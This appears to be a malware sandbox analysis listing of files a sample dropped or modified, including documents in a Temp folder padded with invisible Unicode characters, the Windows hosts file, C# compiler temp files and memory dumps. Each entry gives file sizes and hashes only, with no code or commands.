2b447b7164eedce1d0eb337ac89b75c597128cb7f7a9341bda7eaf651cfcff9e21bba5af883233cdf5af5f1fcc95e6fa52cf93d487e815f4b94da0dc9c6e890b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‏ ‎ ‏‏ \Common Files\Documents\SwitchEnable.pdf

Filesize
273KB

MD5
10ca2a06bfb17a3ad947702756f0f350

SHA1
b94359a05f25b9b216061cf2ba0001feb04c5518

SHA256
42b14a5e4884e5b8abd495899a63d4ad92b93976abba446114a1770755da341e

SHA512
45ad2f5df1a365ad50d0131e8912a882e8707b741cb16c300cefe5cbef93c0a7aba4312c081f80d71369519eb911cd28baa71540157afd79a1e2beadf7715f4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‏ ‎ ‏‏ \Common Files\Documents\TestDebug.docx

Filesize
382KB

MD5
5428d6ca185684fbf4d3a59223af0d04

SHA1
8606430f7a46b1fc087e15b712b772455e3217d6

SHA256
c3bb7e16d0f56b070caa65270866c8ae990728fc8aecd9a67bca66535deab930

SHA512
243add7c4089e44ebf5b7549c8ad572a1c7b4f859b4672b7c2ecae626fbdc0918891d63832074bc697fc55caf04f2407ac33f248700866d7bb366b6b282848af

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‏ ‎ ‏‏ \Common Files\Documents\UnblockBackup.potx

Filesize
436KB

MD5
63891e23076f2654b1b7643ec1af615e

SHA1
184619aeaa8759caa69548301613e4330bd6ce8e

SHA256
396b67d9aa202a7d92535ded9996c3427fa4966ba08bb878b78a132c61158241

SHA512
36c77a8679a4d57fd60a7904cf84aae6d0f07963658f6d0aa2a668c90eb7fb7eb7b0736cfcf1acef11cd13a0b7080a5dc1291abdcf188c5e3ad2fe70581d5468

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\20uloxty\20uloxty.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\20uloxty\20uloxty.cmdline

Filesize
607B

MD5
af69c43d2e0f10aedb2c542f6c6f3adf

SHA1
0c93719c999d9018b3b75ae08b44a5313187ec1a

SHA256
d2520bbf42b6bd39530767f3e692e178d720fa6680885af05f5b66635e5bd0a7

SHA512
e90946f07eede1cd8f85db4176b9da9fe8a8d2c8f134fc7be189354239f237fa05a05fe5e8696cae3d99a7ddbb3414b08c51a21c5b32725962d41e40a2210b5f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\20uloxty\CSC3937E4F8B9400E9AD3E6995F5735.TMP

Filesize
652B

MD5
ea47763bbd1880b107531990fbff6a87

SHA1
8b46557710fe509f62083dbaf5474196dffb74aa

SHA256
bcdca4c501be82f2ddc51a46444be912ed8fcf165527bad42072fe62c79ed756

SHA512
2174e06815abc28449c46ac186709c8802178da18f0d335d48d4f37a4de2c141a4523ae620643cb4718e85c449f7bbb51393d2675c96bb8e9985d84e15c66253

Download Submit
memory/1088-73-0x000001759EE10000-0x000001759EE32000-memory.dmp

Filesize
136KB

Download
memory/4304-221-0x00000215A2D40000-0x00000215A2D48000-memory.dmp

Filesize
32KB

Download